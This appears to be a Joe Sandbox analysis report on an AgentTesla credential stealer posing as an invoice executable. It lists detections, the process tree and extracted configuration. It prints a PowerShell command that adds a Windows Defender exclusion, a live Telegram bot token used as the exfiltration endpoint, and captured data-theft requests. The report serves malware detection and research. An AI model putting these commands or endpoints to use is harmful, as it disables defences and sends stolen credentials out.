Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
COMMERCIAL INVOICE - BL - AWB 7032805642.exe

Overview

General Information

Sample name:COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Analysis ID:1446730
MD5:7831435dbf79df5631126a63a722cf35
SHA1:2380acbc54642882a4a3ebaa0a892eda4ea50b96
SHA256:b4c52779d09ea4edabef9ef75c2756cdd9a1fc0c10564ea7cd153ca223d0a9d8
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Disables UAC (registry)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • COMMERCIAL INVOICE - BL - AWB 7032805642.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" MD5: 7831435DBF79DF5631126A63A722CF35)
    • powershell.exe (PID: 7180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 7204 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 7376 cmdline: C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage?chat_id=6392451645"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    4.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x31e84:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x31ef6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x31f80:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x32012:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x3207c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x320ee:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x32184:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x32214:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Click to see the 15 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe", ParentImage: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe, ParentProcessId: 3648, ParentProcessName: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, ProcessId: 7180, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe", ParentImage: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe, ParentProcessId: 3648, ParentProcessName: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, ProcessId: 7180, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe", ParentImage: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe, ParentProcessId: 3648, ParentProcessName: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force, ProcessId: 7180, ProcessName: powershell.exe

                      Snort Signatures

                      Timestamp:05/23/24-20:22:01.486017
                      SID:2851779
                      Source Port:49711
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeAvira: detected
                      Found malware configuration
                      Source: 4.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage?chat_id=6392451645"}
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe.3648.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage"}
                      Multi AV Scanner detection for submitted file
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeReversingLabs: Detection: 50%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49711 version: TLS 1.2
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Windows.Forms.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Dynamic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdbH source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb0X source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF4A7.tmp.dmp.8.dr

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.10:49711 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: POST /bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b33b51b57f3Host: api.telegram.orgContent-Length: 912Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7b33b51b57f3Host: api.telegram.orgContent-Length: 912Expect: 100-continueConnection: Keep-Alive
                      Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/
                      Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeString found in binary or memory: https://www.google.ru/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49711 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, R1W.cs.Net Code: bZROq

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18631A80_2_00007FF7C18631A8
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C1830A040_2_00007FF7C1830A04
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18313D90_2_00007FF7C18313D9
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18333380_2_00007FF7C1833338
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18316B50_2_00007FF7C18316B5
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C185B0D00_2_00007FF7C185B0D0
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18531000_2_00007FF7C1853100
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C18326080_2_00007FF7C1832608
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeCode function: 0_2_00007FF7C194060B0_2_00007FF7C194060B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B34A504_2_02B34A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B33E384_2_02B33E38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B3CFA84_2_02B3CFA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B39D024_2_02B39D02
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B341804_2_02B34180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_065B35004_2_065B3500
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02B3D3504_2_02B3D350
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: No import functions for PE file found
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000000.1210321020.0000019863842000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330580977.0000019863B90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename64c577c6-448e-42d3-b613-c285a2ac0196.exe4 vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEpecelovecacoD vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEdopejiqajahafecobL vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1330707407.0000019865656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000000.1210335931.000001986384A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEpecelovecacoD vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeBinary or memory string: OriginalFilenameNativeMethods.dll" vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeBinary or memory string: OriginalFilenameEpecelovecacoD vs COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, PublicationOnlyViaConstructorsetUnixFileMode.csSuspicious URL: 'https://www.google.ru/'
                      Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, PublicationOnlyViaConstructorsetUnixFileMode.csSuspicious URL: 'https://www.google.ru/'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/10@1/1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yefk2xkd.aml.ps1Jump to behavior
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
